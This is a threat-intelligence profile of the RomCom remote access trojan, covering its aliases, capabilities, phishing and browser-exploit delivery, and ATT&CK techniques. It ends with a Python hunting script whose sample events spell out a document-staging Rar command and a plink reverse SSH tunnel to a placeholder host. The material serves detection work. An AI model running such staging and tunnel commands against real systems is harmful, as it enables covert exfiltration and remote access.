RomCom RAT
RomCom RAT is a remote access trojan deployed since at least mid-2022 and associated with the threat actor commonly tracked as RomCom, also known as Storm-0978, Tropical Scorpius, UAC-0180, UNC2596, Void Rabisu, and by Google as CIGAR. Reporting also links RomCom RAT activity to the Russian-speaking group Nebulous Mantis.

The malware is actively maintained and supports command execution and the download of additional modules. Documented capabilities include encrypted C2 communications, execution of more than 40 remote commands from a dedicated operator panel, browser-data theft through add-on modules, credential harvesting, system reconnaissance, Active Directory enumeration, lateral movement, and collection of files, credentials, configuration details, and Microsoft Outlook backups.

Persistence has been established through Windows Registry manipulation and COM hijacking. Operators favour living-off-the-land techniques and frequently rotate infrastructure hosted with bulletproof providers such as LuxHost and Aeza.

Delivery has relied on spear-phishing emails carrying links to weaponized documents; earlier related campaigns used the Hancitor loader. One described multi-stage chain starts with a first-stage DLL that contacts C2, retrieves further payloads (including payloads served over IPFS from attacker-controlled domains), executes commands, and finally launches a C++ implant.

RomCom RAT has also been deployed through browser exploitation. Google and ESET reported attacks on Firefox and Tor Browser that chained CVE-2024-9680, a use-after-free in Firefox, with CVE-2024-49039, a Windows Task Scheduler privilege-escalation flaw used to escape the Firefox sandbox, so that the malware was installed with elevated privileges. ESET also described a fake-site chain in which economistjournal[.]cloud redirected to redjournal[.]cloud and ended in a RomCom RAT installation. Most victims identified in that campaign were in Europe and North America.
Reported targeting linked to the associated actor includes critical infrastructure, government agencies, political leaders, and NATO-related defense organizations.
Groups observed using it
2 distinct threat actors attributed by public researchers.
"Proofpoint Links RomCom RAT Hackers to New TransferLoader Malware Activity" ... "TA829, the threat group behind RomCom RAT"
"...Nebulous Mantis that has deployed a remote access trojan called RomCom RAT since mid-2022."
Techniques & procedures
17 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
2 techniques
"Since mid-2022, they’ve deployed RomCom via spear-phishing for espionage, lateral movement, and data theft."
"Attack chains mounted by the group typically involve the use of spear-phishing emails with weaponized document links to distribute RomCom RAT."
Persistence
2 techniques
Privilege Escalation
2 techniques
Stealth
2 techniques
"Nebulous Mantis imitates trusted services like OneDrive to trick victims into downloading infected files, often hosted on Mediafire."
Credential Access
1 technique
"Nebulous Mantis uses RomCom malware for stealthy attacks involving system profiling, credential harvesting, and AD/domain enumeration."
Discovery
4 techniques
Collection
2 techniques
"...collect data of interest, including files, credentials, configuration details, and Microsoft Outlook backups."
"Tools like WinRAR and Plink are deployed, with data exfiltrated from c:\users\public\music."
Command and Control
4 techniques
"The first-stage RomCom DLL is designed to connect to a C2 server and download additional payloads using the InterPlanetary File System (IPFS)..."
"The Nebulous Mantis team, which changes the domains they use every month..."
"The attackers used reverse SSH tunnels to ensure persistence."
"The RAT supports advanced evasion techniques, including living-off-the-land (LOTL) tactics and encrypted command and control (C2) communications."
Exfiltration
1 technique
"...gathers all critical information from the victim machine and uploads it to their C2 servers."
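The Collection, Command and Control, and Exfiltration evidence above describes a concrete, huntable chain: archive with WinRAR, stage under c:\users\public\music, and move the data out through a Plink reverse SSH tunnel. The Python below is an added detection example written for this page, not code from Mallory or from the quoted sources. It applies three rules to Sysmon Event ID 1 (process creation) records and then correlates per host, so that a machine showing both a staging archive and an outbound -R tunnel is surfaced as a full chain. The sample events, hostnames, the svc@203.0.113.10 target and all paths are constructed; the tunnel rule parses plink's separated `-R listen:host:port` form only.

```python
"""Hunt for WinRAR staging and Plink reverse tunnels in Sysmon process events.

The sample events, hosts, users and paths are constructed for this example.
"""
import re
from dataclasses import dataclass

# Staging directory named in the RomCom write-ups (compared case-insensitively).
STAGING_DIR = r"c:\users\public\music"

# Executable names for the archiver and SSH clients the write-ups describe.
ARCHIVERS = {"winrar.exe", "rar.exe"}
SSH_CLIENTS = {"plink.exe", "ssh.exe"}


def tokenize(cmdline: str):
    """Split a Windows command line into arguments, keeping quoted ones whole."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def exe_name(image: str) -> str:
    """Lower-case file name of a process image path."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


@dataclass
class Hit:
    rule: str
    host: str
    image: str
    command_line: str
    detail: str


def rule_staging_archive(ev):
    """Archiver invoked with the staging directory anywhere on its command line."""
    if exe_name(ev["Image"]) in ARCHIVERS and STAGING_DIR in ev["CommandLine"].lower():
        return "archive written to or sourced from " + STAGING_DIR
    return None


def rule_reverse_ssh(ev):
    """plink/ssh started with -R: a remote port forward back into the victim network."""
    if exe_name(ev["Image"]) not in SSH_CLIENTS:
        return None
    toks = tokenize(ev["CommandLine"])
    for i, tok in enumerate(toks):
        if tok == "-R" and i + 1 < len(toks):
            target = next((t for t in toks if "@" in t), "unknown host")
            return f"reverse tunnel {toks[i + 1]} to {target}"
    return None


def rule_staging_access(ev):
    """Any non-archiver process referencing the staging directory (LOTL copies, tools run from it)."""
    if exe_name(ev["Image"]) not in ARCHIVERS and STAGING_DIR in ev["CommandLine"].lower():
        return "command line references " + STAGING_DIR
    return None


RULES = (rule_staging_archive, rule_reverse_ssh, rule_staging_access)


def hunt(events):
    """Run every rule over Sysmon Event ID 1 records; return one Hit per rule match."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 1:          # 1 = ProcessCreate
            continue
        for rule in RULES:
            detail = rule(ev)
            if detail:
                hits.append(Hit(rule.__name__, ev["Computer"], ev["Image"],
                                ev["CommandLine"], detail))
    return hits


def hosts_with_full_chain(hits):
    """Hosts where both the staging archive and the reverse tunnel were observed."""
    seen = {}
    for h in hits:
        seen.setdefault(h.host, set()).add(h.rule)
    return sorted(host for host, rules in seen.items()
                  if {"rule_staging_archive", "rule_reverse_ssh"} <= rules)


# Constructed sample telemetry: hypothetical hosts, users, paths and tunnel target.
SAMPLE_EVENTS = [
    {"EventID": 1, "Computer": "WS-042", "Image": r"C:\Program Files\WinRAR\Rar.exe",
     "CommandLine": r'"C:\Program Files\WinRAR\Rar.exe" a -r -hp C:\Users\Public\Music\out.rar C:\Users\bob\Documents\*.docx'},
    {"EventID": 1, "Computer": "WS-042", "Image": r"C:\Users\Public\Music\plink.exe",
     "CommandLine": r"C:\Users\Public\Music\plink.exe -batch -R 8443:127.0.0.1:3389 svc@203.0.113.10 -pw x"},
    {"EventID": 1, "Computer": "WS-017", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c copy C:\Users\carol\Desktop\notes.txt C:\Users\Public\Music"},
    {"EventID": 1, "Computer": "WS-017", "Image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "CommandLine": r"ssh.exe -L 8080:localhost:8080 dev@10.0.0.5"},   # local forward: not flagged
    {"EventID": 3, "Computer": "WS-042", "Image": r"C:\Users\Public\Music\plink.exe",
     "CommandLine": ""},                                                # network event: skipped
]

if __name__ == "__main__":
    all_hits = hunt(SAMPLE_EVENTS)
    for h in all_hits:
        print(f"[{h.rule}] {h.host}: {h.detail}")
    print("full chain on:", hosts_with_full_chain(all_hits))
```

The single-host correlation is deliberate: WinRAR alone and a staging-directory reference alone are noisy on their own, but the combination of an archive in a world-writable public folder and a client-initiated reverse tunnel on the same machine is the pattern the quoted reporting actually describes.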
IOCs tracked for this family
2 indicators attributed across vendor reports, sandbox runs, and researcher write-ups.
IPs, domains, and DNS infrastructure linked to this family.
Recent activity
7 sources tracked across advisories, community write-ups, and news.
Remote access trojan used by Nebulous Mantis; uses evasion/LOTL tactics and encrypted C2.
Remote access trojan referenced in connection with a threat actor cluster (TA829) and overlapping tactics/infrastructure with TransferLoader activity.
Remote access trojan used by the Russia-aligned TA829 for espionage and financially motivated activity; delivered via phishing tactics (spoofed senders, PDF lures, redirect links) and supported by infrastructure that filters out sandboxed systems.
Remote access trojan used for cyber espionage. Uses living-off-the-land tactics and encrypted C2, leverages bulletproof hosting, establishes persistence via COM hijacking, performs reconnaissance (including time zone discovery), enumerates Active Directory, supports lateral movement, downloads additional payloads/modules (including via IPFS), and can steal browser data and harvest credentials (including Outlook backups).